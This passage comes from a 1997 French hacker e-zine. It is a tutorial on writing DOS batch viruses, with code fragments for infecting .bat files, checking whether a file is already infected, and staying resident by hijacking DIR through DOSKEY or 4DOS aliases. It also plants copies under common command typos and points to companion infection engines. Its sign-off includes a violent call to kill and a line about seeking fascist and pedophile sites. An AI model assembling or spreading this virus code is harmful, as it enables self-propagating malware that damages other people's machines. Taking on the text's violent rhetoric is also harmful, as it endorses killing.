programme. ¦ Del file.old ¦ +----------------------------------------+ Ou encore en employant une structure légèrement différente, vous pouvez rendre le code plus court et plus rapide. +----------------------------------------+ ¦ Type Newvir.bat|find "Virus">>file.bat ¦ Le virus sera placé APRES le ¦ ¦ Programme +----------------------------------------+ Cependant il vous faudra d'abord détecter si le fichier que vous visez est déjà infecté ou non. Pour celà vous devez générer un code du type suivant qui créera un fichier $VIRUS.BAT +------------------------------------------+ ¦ echo :virus >$Virus.BAT ¦ ¦ echo find "Virus" %%1 >>$Virus.bat ¦<- Recherche chaine de caractères ¦ echo If errorlevel 1 goto Y >>$Virus.Bat ¦<- Si trouvé alors aller en Y ¦ echo goto end >>$Virus.bat ¦<- Sinon quitter ¦ echo :Y >>$Virus.bat ¦ ¦ echo Set ok=%%1 >>$Virus.bat ¦<- Variable OK=Nom_du_fichier.bat ¦ echo :End >>$Virus.bat ¦ +------------------------------------------+ Et ensuite appeler le fichier ainsi créé de la manière suivante. +------------------------------------------+ ¦ For %%a in (*.bat) do call $Virus %%a ¦<- Boucle pour détecter fichier ¦ If (%ok%)==() goto Virusend ¦<- Pas de fichier, quitter ¦ ... 'code d'infection' ... ¦ +------------------------------------------+ C'est tout pour les techniques générales, à vous de broder autour et de recoller les morceaux de code dans le bon ordre :). +-------------+ ¦ 3/ ROUTINES ¦ +-------------+ Passons maintenant à des routines plus complexes: Un virus batch peut être résident, mais pas de la manière ou on l'entend habituellement. En utilisant DOSKEY (command.com) ou ALIAS (4dos.com) vous pouvez réaffecter des commandes comme DIR par exemple. En supposant qu'un appel à DIR lance votre virus imaginez les dégats. Avec l'alias de 4DOS c'est totalement transparent, la command ALIAS DIR=`c:\virus.bat^*DIR` vous décharge de l'émulation du DIR par votre virus. Mais du coup un problème se pose: comment détecter 4DOS? simple il suffit de rajouter un code du style +----------------------------------------+ ¦ @Echo Off ¦ ¦ If (%@eval[1+1])==(2) goto 4DOSFound ¦ ¦ ... ¦ ¦ 'instructions virus pour command.com' ¦ ¦ ... ¦ ¦ Goto EndVirus ¦ ¦ :4DOSFound ¦ ¦ ... ¦ ¦ 'instructions virus pour 4DOS.COM' ¦ ¦ ... ¦ ¦ :EndVirus ¦ ¦ 'debut de programme infecté' ¦ +----------------------------------------+ Simple, non? Une procédure trés simple permet d'activer votre virus batch lors des fautes de frappe. En effet sous DOS on remarque un certain nombre de fautes classiques telles que DIOR DUR DOR pour DIR, DEM pour DEL, EDIOT pour Edit, etc... Pour celà il suffit d'extraire le code du virus et de le copier sous ces différents noms dans un répertoire du PATH (c:\dos par exemple), donnant: +------------------------------------------------------------------------+ ¦ SET Virus=%0 ¦ ¦ If exist %0.BAT Set Virus=%0.BAT ¦ ¦ If exist %0 Set Virus=%0 ¦ ¦ For %%a in (dior xcopu dem) do TYPE %Virus%|Find "Virus" >c:\dos\%%a.* ¦ +------------------------------------------------------------------------+ (à vous d'alonger la liste) Pour infecter les fichiers EXE et COM votre virus doit être compagnon, c-a-d ayant le même nom que le fichier infecté. Je vous conseille de lire la FAQ normalement dans ce E-Zine sur le moteur [C-WORM Engine v2.0]. Pour des détails sur l'infection rapide, les modules résidents et Stealth, consultez les FAQs sur les moteurs [ViRAL-BATCH Engine v2.0] et [V-WORM Engine v2.0Ó]. +--------------+ ¦ 4/ ANTIVIRUS ¦ +--------------+ Il n'existe en réalité qu'un seul anti-virus batch performant, il les detecte de manière heuristique et scanning, il dispose aussi d'un module résidant pour tenter de stopper des monstres du style 'BE-Happy!' ou 'm0o0m' c'est BATCH ANTI-VIRUS v4.33 dont je suis l'auteur. L'interface est assez rudimentaire mais efficace. Certains antivirus commerciaux style TBAV (je crois) détectent quelques vieux virus mais rien de bien efficace. +---------------+ ¦ 5/ REFERENCES ¦ +---------------+ Voici la courte liste des textes dit de référence en matière de virus batchs: C-WORM TXT - Documentation sur le moteur compagnon C-WoRM v2.00 V-WORM TXT - Documentation sur le moteur V-WoRM v2.00 Ólpha (inachevé) VIRAL TXT - Documentation sur le moteur ViRAL-BATCH v2.00 BAT_MUF TXT - BATCH Microsoft Undocumented "Features" BFVWG TXT - FAQ sur les virus batchs (anciens) +---------------------------------+ ¦ 6/ CONSPiRACY oF DaRKNESS [CoD] ¦ +---------------------------------+ Si vous ne respectez pas l'un des termes suivants alors n'utilisez pas ce document et allez bruler en Enfer. 1/ L'utilisation/création des virus pour la destruction d'une machine appartenant à une tiers personne est condamnée par [CoD] et par tous les créateurs responsables. 2/ Il est interdit de modifier ce document, en cas de doute envoyez une copie du document au groupe en indiquant ôu vous l'avez trouvé. 3/ FUCK RACISM & KILL RACISTS, il existe des idéaux pour lesquels il faut encore être prêt à tuer/mourir (si Gros Blond gagnait les élections présidentielles par exemple). -- -- Voilà je crois que c'est tout pour cette fois. Je sais que ce texte peut ne pas sembler trés clair de prime abord, mais il contient un complément indispensable aux trois fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT. -- -- DaRK BiRD / CoD Ecrit pour le groupe MJ13 ****************************************************************************** Et voila... qui cloture l'issue #2.0 on va essayer d'etre plus speed pour la 3. Pour contacter un menbre: alli427@hotmail.com le courrier le concernant lui sera retransmis. et n'oublions pas, nous recherchons des sites de fascisme & pedodophile. ALLIGATOR427 / MJ13 03/1997